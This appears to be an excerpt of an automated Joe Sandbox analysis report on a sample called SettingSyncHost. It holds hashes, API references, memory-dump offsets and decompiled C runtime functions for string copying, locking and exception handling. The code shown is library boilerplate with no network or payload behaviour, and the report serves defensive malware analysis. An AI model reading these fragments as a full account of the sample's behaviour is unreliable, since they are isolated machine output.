                                                                                                                                      • Opcode Fuzzy Hash: 5b2d0288226af5e0bd8e56222f5df19a4edc60e3be50f7508f22cad35c5b869d
                                                                                                                                      • Instruction Fuzzy Hash: 0E513674A006A58EDB238F77C4426BBFBE5EF40300F15826ED0968B2D2D7749945CF91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: C:\Users\Public\SettingSyncHost
                                                                                                                                      • API String ID: 0-2131873982
                                                                                                                                      • Opcode ID: f053e867502c063b695edc65e4143caa9da926f0ea4866862a579d2538006324
                                                                                                                                      • Instruction ID: 288ba20b9359c92577d402018891750dc95ea42acaf8081482a15d7b82d91bf1
                                                                                                                                      • Opcode Fuzzy Hash: f053e867502c063b695edc65e4143caa9da926f0ea4866862a579d2538006324
                                                                                                                                      • Instruction Fuzzy Hash: 4B41B671E002A4AFDB13DB9ACC859AEBBFCEF85310F100666E504EB290D7B08E40DB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 003DB46F
                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 003DB523
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                      • String ID: csm
                                                                                                                                      • API String ID: 3480331319-1018135373
                                                                                                                                      • Opcode ID: 812eeb37ba5a4e1d87f7957e5424a29e800f501f0ce9c42a3e53c16ca6bc65bc
                                                                                                                                      • Instruction ID: 83cc322f12e587207c2e09e16ffa9e3592ec4245e9cc1a5c873f4334b1605d6c
                                                                                                                                      • Opcode Fuzzy Hash: 812eeb37ba5a4e1d87f7957e5424a29e800f501f0ce9c42a3e53c16ca6bc65bc
                                                                                                                                      • Instruction Fuzzy Hash: B1419835A0020CDFCF12DF69E845AAEBBB6EF45314F168157E8146B392D731DA11CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free
                                                                                                                                      • String ID: 1Pz?
                                                                                                                                      • API String ID: 269201875-1725551145
                                                                                                                                      • Opcode ID: d476719d7e99d97090a14ee3127f63fd41905c115a3b1cb96924f8dba00c0e8e
                                                                                                                                      • Instruction ID: 46d8f45f4226c562aac0f0a2992a42f6a0a74c692a5e3bfff1028f1346e3b993
                                                                                                                                      • Opcode Fuzzy Hash: d476719d7e99d97090a14ee3127f63fd41905c115a3b1cb96924f8dba00c0e8e
                                                                                                                                      • Instruction Fuzzy Hash: DF41A336E002649FCB15DF69C891A5EB3A6EF88714B16467CE515EF381D731ED02CB80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 003DD480
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EncodePointer
                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                      • Opcode ID: 2aaa9cab27bd1499ddf737264baff4b9b508d877f440f7de8bfb8c6aa0bc710f
                                                                                                                                      • Instruction ID: 4e0dc5f448f7f770ec03356901c43236f58602eb51ac700af1513079cbef8efc
                                                                                                                                      • Opcode Fuzzy Hash: 2aaa9cab27bd1499ddf737264baff4b9b508d877f440f7de8bfb8c6aa0bc710f
                                                                                                                                      • Instruction Fuzzy Hash: BE418B72900209AFCF16CF98ED81AEEBBB6FF49304F15815AF9046B261D335AA50DB51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003EAE60: GetOEMCP.KERNEL32(00000000,003EB0D1,?,?,>=,003DE33E,?,?,?), ref: 003EAE8B
                                                                                                                                      • _free.LIBCMT ref: 003EB12E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free
                                                                                                                                      • String ID: >=
                                                                                                                                      • API String ID: 269201875-2435745117
                                                                                                                                      • Opcode ID: 9af3c8f805d412b54a2cf9c877f69ff4816e8c4172a4be77f0a7994d0f7b1b61
                                                                                                                                      • Instruction ID: bee7311465e06fb7df80d1ea48772b23f75f425273c4e04a795b1ed032182c0f
                                                                                                                                      • Opcode Fuzzy Hash: 9af3c8f805d412b54a2cf9c877f69ff4816e8c4172a4be77f0a7994d0f7b1b61
                                                                                                                                      • Instruction Fuzzy Hash: 8031A3719002999FCB03DF59D891A9BB7B4EF44324F11466AF911AB2D1EB319D10CB60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                      			E00393FEE(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
                                                                                                                                      				intOrPtr* _v12;
                                                                                                                                      				intOrPtr* _v16;
                                                                                                                                      				signed int _v20;
                                                                                                                                      				char _v24;
                                                                                                                                      				intOrPtr _v48;
                                                                                                                                      				intOrPtr* _v52;
                                                                                                                                      				void* _t50;
                                                                                                                                      				intOrPtr* _t52;
                                                                                                                                      				void* _t55;
                                                                                                                                      				LONG* _t59;
                                                                                                                                      				LONG* _t60;
                                                                                                                                      				void* _t66;
                                                                                                                                      				intOrPtr* _t67;
                                                                                                                                      				LONG* _t70;
                                                                                                                                      				LONG* _t71;
                                                                                                                                      				intOrPtr* _t77;
                                                                                                                                      				intOrPtr* _t78;
                                                                                                                                      				void* _t90;
                                                                                                                                      				void* _t91;
                                                                                                                                      				void* _t97;
                                                                                                                                      				char* _t101;
                                                                                                                                      				intOrPtr _t105;
                                                                                                                                      				void* _t109;
                                                                                                                                      				void* _t110;
                                                                                                                                      				void* _t111;
                                                                                                                                      				void* _t112;
                                                                                                                                      				void* _t113;
                                                                                                                                      
                                                                                                                                      				_t90 = __ecx;
                                                                                                                                      				_t1 =  &_a12; // 0x394331
                                                                                                                                      				_t105 =  *_t1;
                                                                                                                                      				_t50 = E0039AADA(_a4, _a8, _t105);
                                                                                                                                      				_t110 = _t109 + 0xc;
                                                                                                                                      				if(_t50 != 0) {
                                                                                                                                      					_push(0);
                                                                                                                                      					_push(0);
                                                                                                                                      					_push(0);
                                                                                                                                      					_push(0);
                                                                                                                                      					_push(0);
                                                                                                                                      					E003991DF();
                                                                                                                                      					asm("int3");
                                                                                                                                      					_t111 = _t110 - 0x10;
                                                                                                                                      					_push(0);
                                                                                                                                      					_v48 = 1;
                                                                                                                                      					_t52 = E0039A7BA(0x355);
                                                                                                                                      					_pop(_t91);
                                                                                                                                      					_v52 = _t52;
                                                                                                                                      					if(_t52 != 0) {
                                                                                                                                      						_t12 = _t52 + 4; // 0x4
                                                                                                                                      						_t101 = _t12;
                                                                                                                                      						 *_t101 = 0;
                                                                                                                                      						 *_t52 = 1;
                                                                                                                                      						_push( *((intOrPtr*)(_t105 + 0x58)));
                                                                                                                                      						_push(0x3bbd80);
                                                                                                                                      						_push( *0x3bbcb4);
                                                                                                                                      						E00393E8E(_t91, _t101, 0x351, 3);
                                                                                                                                      						_t14 = _t105 + 0x58; // 0x58
                                                                                                                                      						_t112 = _t111 + 0x18;
                                                                                                                                      						_v12 = 0x3bbcb4;
                                                                                                                                      						_v16 = _t14;
                                                                                                                                      						while(1) {
                                                                                                                                      							_t55 = E0039A8EB(_t101, 0x351, 0x3bbd7c);
                                                                                                                                      							_t113 = _t112 + 0xc;
                                                                                                                                      							if(_t55 != 0) {
                                                                                                                                      								break;
                                                                                                                                      							}
                                                                                                                                      							_t18 = _v16 + 0x10; // 0x10
                                                                                                                                      							_v16 = _t18;
                                                                                                                                      							_t66 = E0039AB40( *_v16,  *_t18);
                                                                                                                                      							_pop(_t97);
                                                                                                                                      							if(_t66 != 0) {
                                                                                                                                      								_v20 = _v20 & 0x00000000;
                                                                                                                                      							}
                                                                                                                                      							_t67 = _v16;
                                                                                                                                      							_push( *_t67);
                                                                                                                                      							_v12 = _v12 + 0xc;
                                                                                                                                      							_push(0x3bbd80);
                                                                                                                                      							_v16 = _t67;
                                                                                                                                      							_push( *_v12);
                                                                                                                                      							E00393E8E(_t97, _t101, 0x351, 3);
                                                                                                                                      							_t112 = _t113 + 0x18;
                                                                                                                                      							if(_v12 < 0x3bbce4) {
                                                                                                                                      								continue;
                                                                                                                                      							} else {
                                                                                                                                      								if(_v20 != 0) {
                                                                                                                                      									L22:
                                                                                                                                      									E00399DFA(_v24);
                                                                                                                                      									_t59 =  *(_t105 + 0x50);
                                                                                                                                      									if(_t59 != 0 && InterlockedDecrement(_t59) == 0) {
                                                                                                                                      										E00399DFA( *(_t105 + 0x50));
                                                                                                                                      									}
                                                                                                                                      									_t60 =  *(_t105 + 0x54);
                                                                                                                                      									if(_t60 != 0 && InterlockedDecrement(_t60) == 0) {
                                                                                                                                      										E00399DFA( *(_t105 + 0x54));
                                                                                                                                      									}
                                                                                                                                      									_t52 =  *((intOrPtr*)(_t105 + 0x68));
                                                                                                                                      									 *(_t105 + 0x54) = 0;
                                                                                                                                      									 *(_t105 + 0x4c) = 0;
                                                                                                                                      									 *(_t105 + 0x50) = 0;
                                                                                                                                      									 *((intOrPtr*)(_t105 + 0x48)) = 0;
                                                                                                                                      								} else {
                                                                                                                                      									_t70 =  *(_t105 + 0x50);
                                                                                                                                      									if(_t70 != 0 && InterlockedDecrement(_t70) == 0) {
                                                                                                                                      										E00399DFA( *(_t105 + 0x50));
                                                                                                                                      									}
                                                                                                                                      									_t71 =  *(_t105 + 0x54);
                                                                                                                                      									if(_t71 != 0 && InterlockedDecrement(_t71) == 0) {
                                                                                                                                      										E00399DFA( *(_t105 + 0x54));
                                                                                                                                      									}
                                                                                                                                      									_t33 =  &_v24; // 0x394926
                                                                                                                                      									 *(_t105 + 0x54) =  *(_t105 + 0x54) & 0x00000000;
                                                                                                                                      									 *(_t105 + 0x4c) =  *(_t105 + 0x4c) & 0x00000000;
                                                                                                                                      									 *(_t105 + 0x50) =  *_t33;
                                                                                                                                      									 *((intOrPtr*)(_t105 + 0x48)) = _t101;
                                                                                                                                      									_t52 = _t101;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							goto L30;
                                                                                                                                      						}
                                                                                                                                      						_push(0);
                                                                                                                                      						_push(0);
                                                                                                                                      						_push(0);
                                                                                                                                      						_push(0);
                                                                                                                                      						_push(0);
                                                                                                                                      						E003991DF();
                                                                                                                                      						goto L22;
                                                                                                                                      					}
                                                                                                                                      					L30:
                                                                                                                                      					return _t52;
                                                                                                                                      				} else {
                                                                                                                                      					_t77 = _t105 + 0x40;
                                                                                                                                      					if( *_t77 != 0) {
                                                                                                                                      						_push(_t77);
                                                                                                                                      						_push(0x3bbd78);
                                                                                                                                      						E00393E8E(_t90, _a4, _a8, 2);
                                                                                                                                      						_t110 = _t110 + 0x14;
                                                                                                                                      					}
                                                                                                                                      					_t78 = _t105 + 0x80;
                                                                                                                                      					if( *_t78 != 0) {
                                                                                                                                      						_push(_t78);
                                                                                                                                      						_push(0x3bbd74);
                                                                                                                                      						return E00393E8E(_t90, _a4, _a8, 2);
                                                                                                                                      					}
                                                                                                                                      					return _t78;
                                                                                                                                      				}
                                                                                                                                      			}






























                                                                                                                                      0x0039404d

                                                                                                                                      APIs
                                                                                                                                      • _strcpy_s.LIBCMT ref: 00393FFF
                                                                                                                                      • __invoke_watson.LIBCMT ref: 00394053
                                                                                                                                        • Part of subcall function 00393E8E: _strcat_s.LIBCMT ref: 00393EAD
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __invoke_watson_strcat_s_strcpy_s
                                                                                                                                      • String ID: 1C9
                                                                                                                                      • API String ID: 312943863-1589232251
                                                                                                                                      • Opcode ID: 9ff09fb65ec0d6daa5bdab40dc5fc387890bb6f86cb399b08f1c7247d4f326ee
                                                                                                                                      • Instruction ID: 8f5c342fcc1f93eb8541919a56cd38d5d9eef461935e2b9cba6a05b848f766f3
                                                                                                                                      • Opcode Fuzzy Hash: 9ff09fb65ec0d6daa5bdab40dc5fc387890bb6f86cb399b08f1c7247d4f326ee
                                                                                                                                      • Instruction Fuzzy Hash: 21F06DB2940248BBDF236FA5CC02DDA7F5DEF00354F458065FA195A152E7729E14D790
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003D962B
                                                                                                                                      • ___raise_securityfailure.LIBCMT ref: 003D96E8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                      • String ID: V->
                                                                                                                                      • API String ID: 3761405300-1983630420
                                                                                                                                      • Opcode ID: 69d6ad99628383b9fecd5cbea45e732fc56e767b3adad6963466323d85d55133
                                                                                                                                      • Instruction ID: ba8792fc1c67e6b9f032db74bf30a94b40942c24648c5d90a5a5360a4f6da17b
                                                                                                                                      • Opcode Fuzzy Hash: 69d6ad99628383b9fecd5cbea45e732fc56e767b3adad6963466323d85d55133
                                                                                                                                      • Instruction Fuzzy Hash: 5C1190B4A91208DBE755DF25EA816907BF4BF58310F00903AE908AB772E7749D81CB4D
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetOEMCP.KERNEL32(00000000,003EB0D1,?,?,>=,003DE33E,?,?,?), ref: 003EAE8B
                                                                                                                                      • GetACP.KERNEL32(00000000,003EB0D1,?,?,>=,003DE33E,?,?,?), ref: 003EAEA2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: >=
                                                                                                                                      • API String ID: 0-2435745117
                                                                                                                                      • Opcode ID: 45cf99eb442e707056977dfe81bf68ea7f34851a67f3d242d51eee0c23be031e
                                                                                                                                      • Instruction ID: 91d1f1caf322830193e9aff35ae9cf80db77450cb47cd0e231f7a5c6254e763d
                                                                                                                                      • Opcode Fuzzy Hash: 45cf99eb442e707056977dfe81bf68ea7f34851a67f3d242d51eee0c23be031e
                                                                                                                                      • Instruction Fuzzy Hash: E9F06D709017948FDB1ADB69D98C77C77F4BB80339F254B58E025AA2E1DBB1A940CB43
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0039E178(char _a4, intOrPtr _a8) {
                                                                                                                                      				struct _CRITICAL_SECTION* _t8;
                                                                                                                                      				intOrPtr _t11;
                                                                                                                                      				void* _t12;
                                                                                                                                      				void* _t14;
                                                                                                                                      
                                                                                                                                      				_t1 =  &_a4; // 0x392f46
                                                                                                                                      				_t6 =  *_t1;
                                                                                                                                      				if( *_t1 >= 0x14) {
                                                                                                                                      					_t8 = _a8 + 0x20;
                                                                                                                                      					EnterCriticalSection(_t8);
                                                                                                                                      					return _t8;
                                                                                                                                      				} else {
                                                                                                                                      					E00399DC7(_t12, _t14, _t6 + 0x10);
                                                                                                                                      					_t11 = _a8;
                                                                                                                                      					 *(_t11 + 0xc) =  *(_t11 + 0xc) | 0x00008000;
                                                                                                                                      					return _t11;
                                                                                                                                      				}
                                                                                                                                      			}








                                                                                                                                      APIs
                                                                                                                                      • __lock.LIBCMT ref: 0039E189
                                                                                                                                        • Part of subcall function 00399DC7: __mtinitlocknum.LIBCMT ref: 00399DDD
                                                                                                                                        • Part of subcall function 00399DC7: __amsg_exit.LIBCMT ref: 00399DE9
                                                                                                                                        • Part of subcall function 00399DC7: EnterCriticalSection.KERNEL32(00000001,00000001,?,003997EE,0000000D), ref: 00399DF1
                                                                                                                                      • EnterCriticalSection.KERNEL32(-00000014,?,00394BEA,00000001,00000000,003C5DB8,0000000C,00392F46,00000000), ref: 0039E1A2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalEnterSection$__amsg_exit__lock__mtinitlocknum
                                                                                                                                      • String ID: F/9
                                                                                                                                      • API String ID: 3996875869-3327105029
                                                                                                                                      • Opcode ID: e6ceb32f6c557aa241a9605725e8f105d3c059ef4ca868c0f312d48116b1aa19
                                                                                                                                      • Instruction ID: 12524028ddf1e16d1143847d6e1eaecc8c8a84f7ec1df8951f04bd0494862efd
                                                                                                                                      • Opcode Fuzzy Hash: e6ceb32f6c557aa241a9605725e8f105d3c059ef4ca868c0f312d48116b1aa19
                                                                                                                                      • Instruction Fuzzy Hash: 4AD01772500208ABEF409B99E88AE9D3BDCEB84238B558441F44DCB652DB35E8908A18
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%